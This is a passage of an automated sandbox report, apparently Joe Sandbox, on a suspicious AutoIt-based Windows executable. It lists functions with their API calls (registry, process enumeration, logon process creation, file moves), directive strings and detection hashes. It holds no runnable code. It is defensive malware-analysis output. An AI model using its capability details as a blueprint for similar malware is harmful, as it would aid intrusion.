                                • _wcscmp.LIBCMT ref: 00CA6A49
                                • MoveFileW.KERNEL32(?,?), ref: 00CA6A62
                                  • Part of subcall function 00CA6D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00CA6DBA
                                  • Part of subcall function 00CA6D6D: GetLastError.KERNEL32 ref: 00CA6DC5
                                  • Part of subcall function 00CA6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00CA6DD9
                                • _wcscat.LIBCMT ref: 00CA6AA4
                                • SHFileOperationW.SHELL32(?), ref: 00CA6B0C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                                • String ID: \*.*
                                • API String ID: 2323102230-1173974218
                                • Opcode ID: 4c3aabcf07203e9b3031a3ef3b32eec096a941ba1606e0aef0281ba0be5b09c9
                                • Instruction ID: 3636dd919c85f0dd15d4e6e0389eafa8c3ea67d90bb2093e19d1052565719d23
                                • Opcode Fuzzy Hash: 4c3aabcf07203e9b3031a3ef3b32eec096a941ba1606e0aef0281ba0be5b09c9
                                • Instruction Fuzzy Hash: 7D316671800219AACF50EFB4DC45BDDB7B8AF09308F5445EAE51AE3151EB309B89DF64
                                Function 00CA2FCD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: __wcsnicmp
                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                • API String ID: 1038674560-2734436370
                                • Opcode ID: e3f02e239e3b487d91a582a9bcc28dc1d788d4009496b464fc4f84a637ae862d
                                • Instruction ID: 62e0be6f523837e87b19a9a772b24dd6d6f0865241e99f50230a159cb968c2f3
                                • Opcode Fuzzy Hash: e3f02e239e3b487d91a582a9bcc28dc1d788d4009496b464fc4f84a637ae862d
                                • Instruction Fuzzy Hash: FA216B321046737BC231B7799C1AEBB73E89F6731CF104025F99687181EB919B82E3A5
                                Function 00CA17C8 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                Download Yara Rule
                                APIs
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CA180D
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CA1833
                                • SysAllocString.OLEAUT32(00000000), ref: 00CA1836
                                • SysAllocString.OLEAUT32 ref: 00CA1857
                                • SysFreeString.OLEAUT32 ref: 00CA1860
                                • StringFromGUID2.OLE32(?,?,00000028), ref: 00CA187A
                                • SysAllocString.OLEAUT32(?), ref: 00CA1888
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                • String ID:
                                • API String ID: 3761583154-0
                                • Opcode ID: 271c2789ef6e3e2272838187f98c6f8c3bc4f45fbe3855e16827e40e0e712db3
                                • Instruction ID: bd421e20c291161d82866521e2d5c800d442beda50cf7ae43f9f3b5ee3958be8
                                • Opcode Fuzzy Hash: 271c2789ef6e3e2272838187f98c6f8c3bc4f45fbe3855e16827e40e0e712db3
                                • Instruction Fuzzy Hash: 7F217435600215AF9B10ABE9CC88EBE77ECEB0A364B458125F915DF2E0DA74ED418764
                                Function 00CCA0D6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C7C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C7C657
                                  • Part of subcall function 00C7C619: GetStockObject.GDI32(00000011), ref: 00C7C66B
                                  • Part of subcall function 00C7C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C7C675
                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00CCA13B
                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00CCA148
                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00CCA153
                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00CCA162
                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00CCA16E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend$CreateObjectStockWindow
                                • String ID: Msctls_Progress32
                                • API String ID: 1025951953-3636473452
                                • Opcode ID: d221ba32392249746a4c5b7bfdddf640b6da7b8672648ef3e7d8bb178fa615ec
                                • Instruction ID: cd14f808d833f3958dbe171ac69fb15b3ff48578121ce34f15a097a0867d3a0c
                                • Opcode Fuzzy Hash: d221ba32392249746a4c5b7bfdddf640b6da7b8672648ef3e7d8bb178fa615ec
                                • Instruction Fuzzy Hash: 531182B115021DBEEF155F65DC86EEB7F6DEF08798F014215FA18A6090C6729C21DBA0
                                Function 00C7C697 Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                Download Yara Rule
                                APIs
                                • GetClientRect.USER32(?,?), ref: 00C7C6C0
                                • GetWindowRect.USER32(?,?), ref: 00C7C701
                                • ScreenToClient.USER32(?,?), ref: 00C7C729
                                • GetClientRect.USER32(?,?), ref: 00C7C856
                                • GetWindowRect.USER32(?,?), ref: 00C7C86F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Rect$Client$Window$Screen
                                • String ID:
                                • API String ID: 1296646539-0
                                • Opcode ID: cce2ca7e011e3204e29f548459af2dbdd5b8b2a1fd47e0e21d971cbf7b6d08d8
                                • Instruction ID: 99dd76d12e395cca7225865b91f4a564d83a296d0210f8dc09446e6b4dbb4f80
                                • Opcode Fuzzy Hash: cce2ca7e011e3204e29f548459af2dbdd5b8b2a1fd47e0e21d971cbf7b6d08d8
                                • Instruction Fuzzy Hash: 88B1487990024ADBDB14CFA9C5807EDB7B1FF08310F14D52AED69EB254DB30AA40CB65
                                Function 00CA9569 Relevance: 9.2, APIs: 6, Instructions: 204COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _memmove$__itow__swprintf
                                • String ID:
                                • API String ID: 3253778849-0
                                • Opcode ID: 393073a4f73e22837f2b85775877da757f7406cf2603c2931cb838de39875670
                                • Instruction ID: 4e528f7786b1c5c9cde4ae166f5ff56f7008af4ab647067ed9a8d787f14dd287
                                • Opcode Fuzzy Hash: 393073a4f73e22837f2b85775877da757f7406cf2603c2931cb838de39875670
                                • Instruction Fuzzy Hash: BF61AF3050025A9BDB11EF64CCC2EFE37A9EF46318F044559F85AAB192EB34DD09EB61
                                Function 00CC1AD0 Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00CC1B09
                                • Process32FirstW.KERNEL32(00000000,?), ref: 00CC1B17
                                • __wsplitpath.LIBCMT ref: 00CC1B45
                                  • Part of subcall function 00C8297D: __wsplitpath_helper.LIBCMT ref: 00C829BD
                                • _wcscat.LIBCMT ref: 00CC1B5A
                                • Process32NextW.KERNEL32(00000000,?), ref: 00CC1BD0
                                • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00CC1BE2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                • String ID:
                                • API String ID: 1380811348-0
                                • Opcode ID: 3d95bda3aa1985395996cc8304225a895d24c4c7a903fc03f1ec947852277d33
                                • Instruction ID: 93fddeb27a7de34999dc4e104a6bd6e8fd7462349edd6387d952542460162d10
                                • Opcode Fuzzy Hash: 3d95bda3aa1985395996cc8304225a895d24c4c7a903fc03f1ec947852277d33
                                • Instruction Fuzzy Hash: F3516D71504300AFD720EF24C885FABB7E8EF89754F14491DF98A97251EB70EA05DBA2
                                Function 00CC2EC7 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                  • Part of subcall function 00CC3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CC2AA6,?,?), ref: 00CC3B0E
                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CC2FA0
                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CC2FE0
                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00CC3003
                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00CC302C
                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00CC306F
                                • RegCloseKey.ADVAPI32(00000000), ref: 00CC307C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                • String ID:
                                • API String ID: 4046560759-0
                                • Opcode ID: f03e4839919d8d604b026bc2f2cb850783f830f66fdec879d1d9ff3fb380b747
                                • Instruction ID: 41a7975ba63c7025d55bd4606a322e6631825f1d907c81cede99863227beecc2
                                • Opcode Fuzzy Hash: f03e4839919d8d604b026bc2f2cb850783f830f66fdec879d1d9ff3fb380b747
                                • Instruction Fuzzy Hash: 94516A31208245AFC714EF64C885E6EBBF8FF89314F04491DF596872A1DB71EA05DB52
                                Function 00C7DB8C Relevance: 9.2, APIs: 6, Instructions: 160COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _wcscpy$_wcscat
                                • String ID:
                                • API String ID: 2037614760-0
                                • Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                • Instruction ID: 9aad5647d4a911ec80bd0145779b1cb32f20fae05b5800872e46a47ebc697cf4
                                • Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                • Instruction Fuzzy Hash: 03512730900215ABCF22BF9AC4419BDB3B5FF54310F54C04AF99AAB291DB745F82E795
                                Function 00CA2ADC Relevance: 9.2, APIs: 6, Instructions: 158COMMON
                                Download Yara Rule
                                APIs
                                • VariantInit.OLEAUT32(?), ref: 00CA2AF6
                                • VariantClear.OLEAUT32(00000013), ref: 00CA2B68
                                • VariantClear.OLEAUT32(00000000), ref: 00CA2BC3
                                • _memmove.LIBCMT ref: 00CA2BED
                                • VariantClear.OLEAUT32(?), ref: 00CA2C3A
                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00CA2C68
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Variant$Clear$ChangeInitType_memmove
                                • String ID:
                                • API String ID: 1101466143-0
                                • Opcode ID: a7b97bd0fd72130dfca17e7eeadd1e6eaebe58b01eb44f570b5477d7d9a2293b
                                • Instruction ID: c7a1d09c66fad880b36a4bd3f57282fe047987e65c5ca1799a4ffbe804829bdd
                                • Opcode Fuzzy Hash: a7b97bd0fd72130dfca17e7eeadd1e6eaebe58b01eb44f570b5477d7d9a2293b
                                • Instruction Fuzzy Hash: E2517DB5A0021AEFDB14CF58C884AAEB7B8FF4D318B158559E959DB350E330E951CFA0
                                Function 00CC82DB Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetMenu.USER32(?), ref: 00CC833D
                                • GetMenuItemCount.USER32(00000000), ref: 00CC8374
                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00CC839C
                                • GetMenuItemID.USER32(?,?), ref: 00CC840B
                                • GetSubMenu.USER32(?,?), ref: 00CC8419
                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 00CC846A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Menu$Item$CountMessagePostString
                                • String ID:
                                • API String ID: 650687236-0
                                • Opcode ID: f8210985fc7926a98c4d982e0be32480b88dddd4d726d06b50ef4a968e8667b5
                                • Instruction ID: 449e24906c3eefc935581b8b11580aadf6c0248b6461cdfbab09aa7d6f5d8aef
                                • Opcode Fuzzy Hash: f8210985fc7926a98c4d982e0be32480b88dddd4d726d06b50ef4a968e8667b5
                                • Instruction Fuzzy Hash: 4D519E75A0021AEFCF15EFA4C891BAEB7F4EF48710F144459E916BB351CB30AE459B90
                                Function 00CA54E0 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 00CA552E
                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CA5579
                                • IsMenu.USER32(00000000), ref: 00CA5599
                                • CreatePopupMenu.USER32 ref: 00CA55CD
                                • GetMenuItemCount.USER32(000000FF), ref: 00CA562B
                                • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00CA565C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                • String ID:
                                • API String ID: 3311875123-0
                                • Opcode ID: 7e39d5ea9ef833a9b094bc6cecfe64aa46428a72de8f357198561e8c00a4ea87
                                • Instruction ID: 9616c3192c2f1a0e7703ad47058f5ab6cb1a36a33c64512ca692b7be7e7668f7
                                • Opcode Fuzzy Hash: 7e39d5ea9ef833a9b094bc6cecfe64aa46428a72de8f357198561e8c00a4ea87
                                • Instruction Fuzzy Hash: 0651BF70A00A4AEFDF20CF68D888BADBBF5AF5631CF548119F4259B291D3709A44CB51
                                Function 00C7B18C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C7AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00C7AF8E
                                • BeginPaint.USER32(?,?,?,?,?,?), ref: 00C7B1C1
                                • GetWindowRect.USER32(?,?), ref: 00C7B225
                                • ScreenToClient.USER32(?,?), ref: 00C7B242
                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00C7B253
                                • EndPaint.USER32(?,?), ref: 00C7B29D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                • String ID:
                                • API String ID: 1827037458-0
                                • Opcode ID: 71fe1fa99c006a0320c18ec50283469b355086ccd9cf969c21e147db8e1d2656
                                • Instruction ID: 9c1eb8dae64ab8cb1d7c2c77ecd86550acf034b1c4af761eb7e477177090afc0
                                • Opcode Fuzzy Hash: 71fe1fa99c006a0320c18ec50283469b355086ccd9cf969c21e147db8e1d2656
                                • Instruction Fuzzy Hash: 4841A075100300AFC721DF25DCC4F6A7BE8FB55320F144669FAAA8A2A2D7319D469B61
                                Function 00CCE1A7 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                Download Yara Rule
                                APIs
                                • ShowWindow.USER32(00D21810,00000000,?,?,00D21810,00D21810,?,00CDE2D6), ref: 00CCE21B
                                • EnableWindow.USER32(00000000,00000000), ref: 00CCE23F
                                • ShowWindow.USER32(00D21810,00000000,?,?,00D21810,00D21810,?,00CDE2D6), ref: 00CCE29F
                                • ShowWindow.USER32(00000000,00000004,?,?,00D21810,00D21810,?,00CDE2D6), ref: 00CCE2B1
                                • EnableWindow.USER32(00000000,00000001), ref: 00CCE2D5
                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00CCE2F8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Window$Show$Enable$MessageSend
                                • String ID:
                                • API String ID: 642888154-0
                                • Opcode ID: 845d0adfd040b349918c34f95eafbd858e072f21e6ee1aa8897d2c6a49483eeb
                                • Instruction ID: 5f1a4ff24e48a70b5157da75fea01be2c24171d3bb78c1a9fd008dbff3a0467b
                                • Opcode Fuzzy Hash: 845d0adfd040b349918c34f95eafbd858e072f21e6ee1aa8897d2c6a49483eeb
                                • Instruction Fuzzy Hash: F4416D74601141EFDB26CF24C499F947BE9BB0B314F1841BDFA698F6A2C731AA41CB51
                                Function 00C9BC90 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C9BCD9
                                • OpenProcessToken.ADVAPI32(00000000), ref: 00C9BCE0
                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C9BCEF
                                • CloseHandle.KERNEL32(00000004), ref: 00C9BCFA
                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C9BD29
                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 00C9BD3D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                • String ID:
                                • API String ID: 1413079979-0
                                • Opcode ID: 50274f47c4d179212b922bacc534322016eb0ce177e10596ae5ef27184fe64e2
                                • Instruction ID: 7dd0044d376d17f259913445bc7b8bf7eb3dcd1f649b41221d3dd299c293b056
                                • Opcode Fuzzy Hash: 50274f47c4d179212b922bacc534322016eb0ce177e10596ae5ef27184fe64e2
                                • Instruction Fuzzy Hash: 7C216D72101249BBDF019FA9EE4DBEE7BA9EF04318F044014FA01AA160C776DE61DB60
                                Function 00CCE9C8 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C7B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00C7B5EB
                                  • Part of subcall function 00C7B58B: SelectObject.GDI32(?,00000000), ref: 00C7B5FA
                                  • Part of subcall function 00C7B58B: BeginPath.GDI32(?), ref: 00C7B611
                                  • Part of subcall function 00C7B58B: SelectObject.GDI32(?,00000000), ref: 00C7B63B
                                • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00CCE9F2
                                • LineTo.GDI32(00000000,00000003,?), ref: 00CCEA06
                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00CCEA14
                                • LineTo.GDI32(00000000,00000000,?), ref: 00CCEA24
                                • EndPath.GDI32(00000000), ref: 00CCEA34
